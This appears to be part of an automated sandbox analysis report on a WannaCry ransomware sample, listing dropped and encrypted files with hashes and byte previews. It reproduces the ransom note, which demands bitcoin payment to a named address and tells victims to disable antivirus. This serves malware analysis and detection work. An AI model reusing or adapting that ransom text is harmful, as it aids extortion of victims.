                                                  Preview:WANACRY!....C.-..\Xse,...v.E.k...... .U7..^.../.....G..S..B.(0v...-...w....3.]..H..^XZCi.YZ.=WN}m..qF..Y......%..`q.8....S...f.......!.i...j.9...C....Ag.i.&._..}......F.p........?.Y.}..{.8....o.f(1ci.MU..# V.,p<.sH}../.#..m..Vv...@3|]..p.;B..hu..e.&sB).g.....-)......?$.N!...vm..|...t..;..x..S.q..5..bF`:...m.r%......;+\....ev).e...........c[.......SG....:.M..T...I.^..~..(...v.yS.v~S.F.d.VY7,Z.....].5.;..Cc..........^A.]jZ.n:'Y.W.W.2G.s...>....<.lj..-....xlZ.x..W&t........U.*_#..Gx....:...#..[........d...U.....o..A/p.z..... .%%...}P@B...4G..B..g...@..P.f.39..........N../...VC_.[%.n.-Q...+*v.z .."%9x...T.%C..e..0.w.Gs.k........w/V..L.....p...^M.....'...\M....J.E*..(S.LJ....t.MQO......8..Kh.....:.K.+.B.2%..~.5.$...NP..6@..N..tQ...Ej.".9PO.8....^..>.h@.Z.......Q......@B....z.......l|!.....:S.....x..:....mL<~....'[....{...(.J..{...n9x..\.....t..=......x...;.5...g....6.E....,...k.....h[w....Qa`..Jz.6.W......#LJ..~....(>..usMx......=y1$t..gg

                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\us_tv_and_film.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):164584
                                                  Entropy (8bit):7.998869873581819
                                                  Encrypted:true
                                                  SSDEEP:3072:ftz8wvDzxxhwYrMVN7kx0CCpwY7zC6BTgc+4enneMhegPL2YV12K:WGDzxvXrYixmpwATg4yvhJT2YV12K
                                                  MD5:304FE6BFADB9A351FF1102B5FA0EC1E4
                                                  SHA1:7F42E1495C522BE9DFDC3B2340DBAF51F3818F04
                                                  SHA-256:4D496F0A0489557C0B9089E890BAE80E26AC460A9571D2C780F02E0BC271CF21
                                                  SHA-512:1E4DBF633371FB5693BBA4ED50BDF3ECAAB4C775CE28EA86374616DE9FED043B6BFE1EB00291F0C2A1FDF0D435312B5D8125EE9C7991CFEEC9CF560CEF2EB4F2
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......e;.M...W..i8Z.*.......Jv.......~*{6....iL...x..=.....T.GpR.......n...l?#8.T..Q...U..$=.|..&.2.i.a..w...B..P....."..".;..y.g......tj...2/.^..*..L.E.sVbK.n.y..%...n......m...`..s.._-.r...J.,.V$.._V..).,.5.@.M...#I..)sT N.......'.|.C...z...4.............r]."\....@..R,.!US#.x.P...>....#.2H....|g.._..:.Sg.%k.........s.&..FY.k\.4.^en....}...j|2..f.k...%..~.`v..J....g?t.h...... Z................B..h...5UML...]S.......-.x.w3D.e...r5.0..* ..4...e...`m.X.&Z.% .k$.X.W..0.........A_!..h...2d.....r5v)..q%X....&...BF..qm...9..2........)....<.6..r.n.2.p..-.._{-.a.... 1.0.i..#@.F}r......b.]$.F9....d..FA...V..\0.1.6Rl$...Ox....@.. .>......MR.|KD.nf.x...&{.T6..l....`..y..........@......";....5.m..Gc..D.u.........SQC....b....K.3.X3....y_..-j ...6._...'...~M.X..Q.:.,@IY"...b.x.LI3.Mcy..]..h.f.g....VDkS..}).o........0..?..........W#.."1J....V..bG....#`..Z2{...tSr..T.'A.+...9.......<^.X..S..Dj..M..L/..gG.`....\....|.;al^.S.....Ev..)0I..c

                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):296
                                                  Entropy (8bit):7.20891929528607
                                                  Encrypted:false
                                                  SSDEEP:6:bkElyDeGTWdc+/VQT7dR/0B4pwNj9Tl7zcNkf/8ZG1lDxQwdr3vm:bkEIiGa0T7C4pqj9TpA6E4j6N
                                                  MD5:2068EB497E38B7AC3AF16393B69E643B
                                                  SHA1:423F6158E2566BBAB72BBCDFFF8E6ACBB700899F
                                                  SHA-256:2D507AA0BDBB90DC79937BE7F42718F500888A8E7CC22C0D867A4FEC6B904297
                                                  SHA-512:D8A72E8A9182EFEDBF8A1EBA54CA371B15ED2B3B2A5F09AAC64982C09A1ABB8EA6BA0F04CD9D96E45EC4E6D217AE69D2EC3D4B4A617280B4B844498258CAF629
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....9..-.e*.P.!...'......@...3.1....p,..^.......Z....#.+....n .(b...)2|.8W.*"=..p.:.)}.ff.L.yPx0....7......1...:':....y.....D.../K...........Vt..S.M+..,..%.......1...T..mk.v.C.0...Y.Db. .d..\z..Y..f..k4:.2..*.;.C.RK.vP/.a$....K.1af.o.5.....x.Z.7.............".lE....j.IN..

                                                  C:\Users\user\AppData\Local\IconCache.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):27560
                                                  Entropy (8bit):7.993216079442338
                                                  Encrypted:true
                                                  SSDEEP:768:HLLUOsZgjXpBQijjNTeNG4Me9kbygubjI/vH8L4wq2Z4g42O:nUtQX3j4GsjxIXH8Qngm
                                                  MD5:379966675A50C2171AC9FB870A8868A7
                                                  SHA1:5754800998E0B822DEAD34DC53E3A8F954D03615
                                                  SHA-256:CCA274D4E668149678A0304DCF2FF6CA1F42B09D131575933FB2C894A49E6F56
                                                  SHA-512:B172C3F457F2329EEF4FA0C8FCAF01EAE0FD515952AD28FFFC1B4A65C684C425B9CE10F5F2A9A661EEA2416FC51D04D951A59617630F819A2304D5643A560C41
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!..............WQ...\A4.{.7.Y.....#...Xk\F..%.iI.o.q..Q..B.sa,.(K..p1U;..e....~0_=B.....+..+.0....)*~...S.v?p.V.:a..........u..m.......[.Ho.^/...c..j."...G..9......<YG(..!.........L...o.F..K.a..9.n#.T`.\.2..%Q....k-7s..w..;F..j.hX@..o.M.@)s3....o..^.....j.........%.V........*..K...~[.l.,....5h.jQ....%.(.TQ\.,......@w....|.....N.x+.Vg.H.u...1W=.5...@...b.....S`..l..........N....q.]S.P.....8.X..rX.I.g.h..Y...P}....Nk..@D>9..e..6..b.>OD....m.[.H..._.sQUc2J[19....?y.....VMv..h$C"&. .),.r..iK....k.............Z.A.....cF.8.L?-...,...#.....l.1..<.Dt....!.J..@.D\j.j...S.hm..|%.,>.....e......../.J..J..C.H.Q..#.....n/....q.wQY..ZvVX..d...W.M.\..4..E...........v.l...h........mt....kT$_.`.X%..g...'.......$......;.'..gC.....(.i...\K.....A...k.>...t.?.....=.}6...n..]H..t......g....v.q.w...S.X...R.l..(...HD..../'..v....mqW[Q..Qx.....A=..%........._Ug..}L.c.....4.,,n.e.Ju9.2t.h...Q...{..D.."....[...B..f..S.......<G.K.~...P|.Y.".=.,'^....F.JRt..1.x

                                                  C:\Users\user\AppData\Local\Intel\CUIPromotions\Images\000000_INTEL.ODYSSEY_ADDITIONAL_GAMEPLAY_ASSET_CUI.2.3-600x300.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):229640
                                                  Entropy (8bit):7.999232301019019
                                                  Encrypted:true
                                                  SSDEEP:6144:lj/8zxXqsLWOEXAsybX9rXe95+LNAtOa+4BNxDbqpMT:ZkxXqsLWOEM9LA5GNAtG4BN5biW
                                                  MD5:A63F99263AA8CF26AC5F3203B3C3A408
                                                  SHA1:152D6ABA149ED75C18F6DCFD88078EF2CF415D5D
                                                  SHA-256:A6CE1C1C7D74F13FCBA5344BFD1E4FE7D6B8B432DAF87965200373E4056C786E
                                                  SHA-512:FBD0765F11E0C0E79E58815D6CDAE69C2B525186D1644DF8B39148F3BF7E110959C9EDAEC6B5EEF204443BC4DCA4734AFEDBF20E8806AA540CCAEAA0E894BBD0
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....l.U.;.}.y}...e.!..[<..o...B..j.s...rP.l..jx....O..@.~.u.....E...$..#.\u...4...K9.. n.....Rx,.zn..3 .........^0c..Ay....A.w..lL.q=..X.d.]L7..k.x.s.....U....>\.l..|.H...-....N......D.<...g.V.&r....V........FR....PT...F...i..~)..8`Tle...||.....6x........................._.G.4?.;.C.....L..7..B3.ap...E..m.:....-.=.Il.}...t.....xkI..Qq......N.=@...}=C...{.v...}...M..J.i../&Hzm.|]..&>..J.Z..1......J.....B......-NE...5.....o.j....Gc.W.E...[PA...a<..B....p....g!..L.......Z6..]G..(.g.|....6x]0g...?:...c@o.....j.s._L.on....=....|G...*...Z..1*.XD..*.F.R_mM.?.X.W.....pW....^}fT.N..jO..+..QHO...uR7-...>t|./.`.Ft...t..".%..?....5/L...X.ep...!..C.@.j.T<0C!#...05.d..g.B.+..s.N..A-3}.nV.)...s......T.$.F...|...(....N-.l..u..nfW.jc..P...j4...9.^B'..}./..w*.I.g>!k....jX..."..N..=..=.M....O..nr.....0....wL....VfK......$....h|..8*.Z....\c.%B.O..*6m..`....c|....@qA...{'(..L..k.f.a...0.h..pXj..e..<Y8G(o0..@Yd$.......)...........nY..8GI.....H..q..o.u

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\@Please_Read_Me@.txt

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\@WanaDecryptor@.exe.lnk

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon May 15 07:29:01 2023, mtime=Mon May 15 07:29:01 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                  Category:dropped
                                                  Size (bytes):577
                                                  Entropy (8bit):5.195403137227408
                                                  Encrypted:false
                                                  SSDEEP:12:8BiXpzYNbfIhUV9nzUoBjAzodwSY+GGY+GlmCt:8BzqhEZAS1TGGTGlm
                                                  MD5:AA6944E5A685F01614D23396940EDB50
                                                  SHA1:78E8BF9C092559F147E90E6222715CDF2B094048
                                                  SHA-256:636345AD7C515F5814FE1A1A7F8FD8F416536760B1947739E29DACE712AFA005
                                                  SHA-512:B5F30DF5E81368BE91278EDA05CD9A5C708142818E63130A719E5691022CAB32F5C37F41DEBA8E2B7EDBBD8EA8A67A75E2FF842DE2C3E428CC944E970332449A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:L..................F.... .....kM......kM.....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....b.M....:..M......t.2......J.. .@WANAD~1.EXE..X......V.C.V.C.....b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y.............5*.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226546..............n4UB.. .|..oT..9.......P..#.....n4UB.. .|..oT..9.......P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\NGenDisable.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):600
                                                  Entropy (8bit):7.611529433469389
                                                  Encrypted:false
                                                  SSDEEP:12:bkEZLljbY/sEjhFuFuSL9/ts2x+w05/2eEhLVSLSeSrPdQUD2VeyVR+Arfc:bkAlI/s0hFuFuc17e5/1Eh0SeKdQUAeB
                                                  MD5:12615C22B678522AFDCCF893A3DEBDDD
                                                  SHA1:D10F0E527CB1074103025A5D5C9469F45309A1D2
                                                  SHA-256:34864BBEADEDE214D9C8AEFC0013139348039302AADD6D249528DE4B622CA177
                                                  SHA-512:625D2AFC4C3E7E21C1ACE7E4F3715BB7B9E012EB64BB40E29F68ADC943D3ACFC1EBC7FE3370B968EEF98A2B44872CE5739B740C391C60F45BA584C700870CA7A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....+...H}....U./.[......Z.......:.o$CSbYK.g..{0....;p.B.~....2.....W..{.S..V.....J......f}....<..ZC....B~..u....h4.$..=).......Q..z....d.J].z,6..WmR.v(P.vn..........'\.F..Z.&xF.D..>_~..q.{.s...+.>g.TJf.rAD....M>.Pds.P..3....9...1.T....$m@)....:.......Z....F...k.._.ac'%..&.....+...8.q..>...5C;\UzTl.>..mO7...4.H.Z#J......>.AZYU7..1$.g.z.{M..4..X1vU.[1..\?c6.!.Z..Rck..N...*Nn..0.4Y..5T..^KI.l|@......FI^.m../.....x.\(..oR.]..'5q...w.n..[g]qIh....x.J..jt...`......+.lt.9.+$..,J;.{.%!t`..m...g.a..b....0...v......._."!i.0.;.B.;m`8%...-.37.oI......9b<..z

                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):16664
                                                  Entropy (8bit):7.989500437442936
                                                  Encrypted:false
                                                  SSDEEP:384:I2dmixqQdEu3NZAzrgPDrpVKiVqk3RRX2pXR6jkPMof+mZ408s0BvLm:I2A8NdP9yzCDX/53RRXi8kP1mmeFk
                                                  MD5:EAEF79A8A6F81D681FFBD02F15A32591
                                                  SHA1:89A65E477A831AFC8FFC3195E08724A18B108E7E
                                                  SHA-256:51AC71D80654E04F0EE51E3735E7BC5AE3EC1AE31756EC1FEF6D73034E593C4D
                                                  SHA-512:2CE2FA4642413DA37456C547813DFFC5853AE346E7B27B93D211285FF8688CC8783AF82BD10702C1CC64B6E3B36ACD9E46F61EEFEA1D472B3E873C90611CB03C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......P.w..iJ.@.M.V.....(........S..k..{..H{U..(/.....`..p...."..tJ.9...wP.Q.%J...f|.T...CN.....`..<......|..[=.=..........aZ=..zd!..r....);.V\....F.Y9......7...4...Z...;H0.E)..O*.(1.$7R+......G?...........g.d5...@w...!.R.....[..#6&&K...>....3.....@...........!.........UT}'....[).b.4.#..X2.j...L3cI..7,..Aa=.Hr7....X....T.N..d.... .....t..&.....|^.N....!-.....*.@...}....J...U]..b..bU...u.......Rg.b.D>...-bX.9._W......8J}..4.3...W...4'P..;z$9!....i....qJ.1...1Dy.....j...I..t..|.i.=.....k...U..-...D.........6L;...Q...4...7.-..5{....l.O3...@8O..a........x.(.S...J:.K.7t..4.S.kJ.........u5....a....M.L........v.....X..0.9..Pc...o........^.`..)...E...9..g..W..c.....o.7qn..t....'.....?ul ...<.].hug....y.(....<...yz...@. .v..C..5..X..!....r.\..RdE....E....n^....7I....X.cg-.S.%L..:..u&9....Q.j...e".b......&.J.[......".(...n20Wp[....W..^.../.1..Sv.q...Z.~...[.... !....j.....baDP........)u:tp.y...Qi.1...Z%..l....h.*.....W..

                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):45336
                                                  Entropy (8bit):7.995175612324924
                                                  Encrypted:true
                                                  SSDEEP:768:I912xNBGW/JXjscqHH+mNECUwfMyVQPfegJS1VkiVFQCz65Kvi2KZz7/SAxyWMW:I9gxV/JsT2njYgA1J3JGii2EbSiyO
                                                  MD5:C7E4287E00225B6AA3E68BEC6CF2310B
                                                  SHA1:89B9ACC40592D70C10240106FFDD647FE96DE754
                                                  SHA-256:35CC46C514C1B50FA3B48700E57DC5BF7050EDAF7211E2C2D6650D4BBE8327D3
                                                  SHA-512:E5ACDEDBEF8E9F87EA9FE8FE4EE06EFE4FB7F4642AF8507CE0B97DE404E0BA9183ACA251AFAAD3E99703D4CBE6FA3CDFA05107842C74649A449EA32219B283C6
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....c..m.....y.+EM2z@....7Pg._OF........1L....*.{.$u.,..os..a>UB....n..Sh.%p..%.$.............w..Q~...Ez..|{..'.c..#.l..V...Qb..U.n.3.../........L.t....HX.k...i,.1..<~.....x...sV.,..d.:..mt.=.7kx]...}Y..C..x.%..U._....>.r...7Zd<.i.`.=.....6B..................(.O$.+.v.X.@[.'*....X.GN....x.77q2.;g.G.i..z...nSOV~A..?O..:..xu.JP,......F&s.0.....T1U.M"`R.....6..1....F.9...:......U......@......!....Ua..P...u.2.....y..........`#.[.C&....+..YA.F....l(.e...{.....$P...a.x.....5L..B.7......F+.......E.h...._...h...8..S.*...b.G...G.....B..E.dEh..."7..2.b...B..z..y..[UX6^.............,7.g...9KC8.?j.....9.b.....f.......0......V..9....m}......".....Cf;.fTT...*{1~...;.x..H..j..)X%...8xU.g}a.p.x..4..F...f.u|#..m88u.r...W...=.....H.6.-........uHhX/../.swB...bId.Z......`".'....Q..p.....&.Q@..RdRSSh:k........)d...3.....J......}...n...K..p&5EY...1D.Z.....p~.YS....E.]]W.4M3..T.........N..../..G..).c.l'/.T;............X.O.....6VH.9G}Y..4...Llz.cI

                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\@Please_Read_Me@.txt

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\@WanaDecryptor@.exe.lnk

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon May 15 07:29:01 2023, mtime=Mon May 15 07:29:01 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                  Category:dropped
                                                  Size (bytes):577
                                                  Entropy (8bit):5.195403137227408
                                                  Encrypted:false
                                                  SSDEEP:12:8BiXpzYNbfIhUV9nzUoBjAzodwSY+GGY+GlmCt:8BzqhEZAS1TGGTGlm
                                                  MD5:AA6944E5A685F01614D23396940EDB50
                                                  SHA1:78E8BF9C092559F147E90E6222715CDF2B094048
                                                  SHA-256:636345AD7C515F5814FE1A1A7F8FD8F416536760B1947739E29DACE712AFA005
                                                  SHA-512:B5F30DF5E81368BE91278EDA05CD9A5C708142818E63130A719E5691022CAB32F5C37F41DEBA8E2B7EDBBD8EA8A67A75E2FF842DE2C3E428CC944E970332449A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:L..................F.... .....kM......kM.....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....b.M....:..M......t.2......J.. .@WANAD~1.EXE..X......V.C.V.C.....b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y.............5*.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226546..............n4UB.. .|..oT..9.......P..#.....n4UB.. .|..oT..9.......P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.bak.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):6776
                                                  Entropy (8bit):7.974458092262019
                                                  Encrypted:false
                                                  SSDEEP:96:ohRzZAZyHeVntA9weGkU1Y7Sv1H7np0KpHyw/mCkUJ+LwtC671VRRinkN7Y2:GRzZAZ9hYGJTp913/xYktC6x0nkD
                                                  MD5:4132BFB8CD26079AA00E3C7105030CC2
                                                  SHA1:FFA1F27521FD78CA5D42B7D3D794DC899B742A02
                                                  SHA-256:D1757B15DF0D953EC7728A2A3EC4B82008106D49F42A53A5B606BDE1A69B5E94
                                                  SHA-512:A60A04A924AA116D3CD62961739A27EB64B2164A733DCB9DB141B8191EA119F61D5E663C7BBCB56BE31672BEBBCC39E56EBAFB991D65A6D487EDD821A9AA24E9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....?....D.........}..J..&...7=.......`...3..,.".T...Z..g.h....}....M......R..m@U.^.....<.Y.us`..;.......@......-...F<.R.6........_G..-.D.j..(..x<..Z.....kW...hj.m.3Q.vK&.C..~dS}m.F....\.7..9.l.+!.le`.....%....<Z..bi(..E.)....X.L4}.U.Q.Z..H.VcY..:..G....`.......O.W..|e..2....~...."..L..<U....~=....'4...x.j.%..+.D.2[j....c..pz........K..D.C"....N.XbO.\.(QU+.....:.*..k.....uE.Q4..2.$(.2AjO....A.....&.. [vE4.....0...U....<F..]..FzC}xC.....K......,._F%..&Y..Q...1T.k..e.ma/.<....Tf..`...=......R....{....O.c...M...=8...eyRf.t.. ?....0#..md.N.....4Jv.%.Ce.m.hE.=.... _.N(..q... o.ciW....#.]..c.....2y_...........]..K....A4}.C@....\q...G....... 0.6.~.......5..K....Ga...8!g.....f..R.@5+:V9%...J...`rP.d.o...r....uDGj.?,.(.'.......3....l...=..^.........#...6Oi..........S..|5.B..19.}.....)^.(.f.F..7..V4.;...>n..;..[.r9.....p...Ff..../[....E"../XLYdK......oL...XM.i.c..l....[s..!T\.......3......S... .2.q....C....(...L....&....s3.a.k...e=&SpJw~|

                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):4664
                                                  Entropy (8bit):7.960020895062463
                                                  Encrypted:false
                                                  SSDEEP:96:ofmq0hddugcsq3UyxEvuOw5ZfU3iGiMhJ8FvRHXaHz:2mq2d8sq3UyJOd9ihZ3aT
                                                  MD5:BFDF16B75688901DC1C4CFEFEC8CEEAC
                                                  SHA1:47CBD1085EC68533A06EC29A9451118BABC9B884
                                                  SHA-256:B3CD72E2F6AF63D744F52714676C2DF9978E5435F3EA6683C269B6FFEADF3A1F
                                                  SHA-512:A5723FB6BFD5CA65F041B31EA200659DE11FB7822AE091F96585B732B578DA29351EA75FB4C9C71DE0AE6D8635B8CDEF17BFD5BFB825395DDF6E79C2B4655D48
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....}...+....^..p[C...N*..J...f...TJRK+R........Y...B......@..w.G.....^...L.dP8.. ...^s........[A5.S.N...{.>u..Q..pU.Q..L.[.^.Msb..Z~m...W.i.2.*...W..<.aI.8.......eB.G..S......x..T..3..M]$..*..T..@{,;S......>... R...;.m.."...c.6.CF...r1...wm...p.............a..."d_....D..."..n...e...hV.....<.n..Ar..>...O.....q.....F<."hS. .....g.....*tQ.J.].#....B....<..q...l..O6%...B.aM.....E>...3..:Qmy*.d..X.e...&M.j..V..|*@.....d.vY.&2.mfw.N..c.......V..sq^.(......].P.Yl.....|F...4..<...|.;..x..`6O.G...ju./"..a=....`0F.px.....4..!..*.m..&&+..8.t.,......I..v.<,....R...C.L...^...t..6.i.J.......>...,7...~.c..XY...EO.....Y.4.#..r..Y...Q...B.....g.8`....F..l... fHw...u.S... .."..m....).G.4...U8..|.DB..q...(w..H).x.?F....Ld....)iJ...5^e..,D|`fMo..[(.gag....)Y[.k'^.#e.T.Qr.c..g..N..D..y.|../.........P%N?..v...+.....z=...3..._..B_..j.....wT.M.e#.5p...t.f...D.m...P...V.?*.`..T(..EC...Yx.y..Q.ls*...@..\d.~......y\g.fP.._...#..xT.{.........+r.x....

                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-US{BBE0BDBE-F41F-4225-8E17-87C64C39622B}\{038DC840-BEFD-4EDF-A537-D206F96DC1A1}mt11414620.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8616
                                                  Entropy (8bit):7.977366340510731
                                                  Encrypted:false
                                                  SSDEEP:192:NFw9hAeAdu0xRsP6QjTMuMI1iNPQUgW/DVkLVYqQBpUM8zIwsF8l:64ZEh7M9HgUixYdBezzII
                                                  MD5:7E50C396EA7103AAAAC49758D0941AB2
                                                  SHA1:1A3DB5777DD7E4DEC83D12A2A7284969AE287CB2
                                                  SHA-256:BF17F9F283A66AC4C2764192437C7736FE9CBDB2426C9A172292F8EDCEBFA724
                                                  SHA-512:B30B1FBF651EA3CCBDFA0F547D35F9FE56BC5E70ECFFB4B5639474BE62F77A374ED46F21CC7DD57BEE5A6FD07CC72CA7EA0EF9ED2E701F5EFA41FC7126265B15
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....#./l./..x....}.2..+...a...\.=.c..G\.._M..C...j.}B..F.DA......Tc..7D........xWY.......D.T....@N@j._(.86m.@....rCQ...l..N.e.......(c...|.*v....pll...Dr../=..1.....a.zD..&.&...M..k.}.:s..(......t..F..L...'.lb^7m....I..g.....:...+....?...DF8..... ......o...O.....Uu..jx.\.).r1.8.!a.k.... ..:(.D"m8I)...f..0u.U.H..k`...l........$..a6.....R<..S.h.B....{1e.h..8.....l.+XJ....PZ..T.A.#.c..[.fS......~~M.TL.C.!.......a@3-..i..XP2.&G.S...P..?...d..>3......\"a..0..8.w..G........u5$..4.As;.........0W....cI......J.m...l..bR.q.q;.........p.=.f....q....1..#..q.(.a.mD..x...+.Hi..A....bWAW%..}.'w..:.oY..{Vm..NKc...T....,.<.....>U.},..C..Sy......'..".......K?YG.6..+0.L..z(.M..<.....CWL=......}.....)`Y.......)...b...=...pp....{.(...|.w..i.{.V..u...i.=.N!H..>...x.yu.........?.V...&`Up....5o~.f:o0..b.>Z....$S.c.7..f...V.>!.[(x7L.Wl....L.l....|m..#o.+f".c.{.M.p...fo...&x7%5$Dq...v...>...Pmxo......m>SU..]"...8..Xdnf....z.NS..cw

                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-US{BBE0BDBE-F41F-4225-8E17-87C64C39622B}\{2C3729F5-6B1A-4F06-B77C-2AB41C959EB6}mt11829122.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):14408
                                                  Entropy (8bit):7.986441560914633
                                                  Encrypted:false
                                                  SSDEEP:384:+DQzXYhwYK2o/44QfPxNBUvKKkxdjIK0C6iV:mq28rQCyKkrIK0C6iV
                                                  MD5:65590F49E90EA9A64AB065A9C06ADC9C
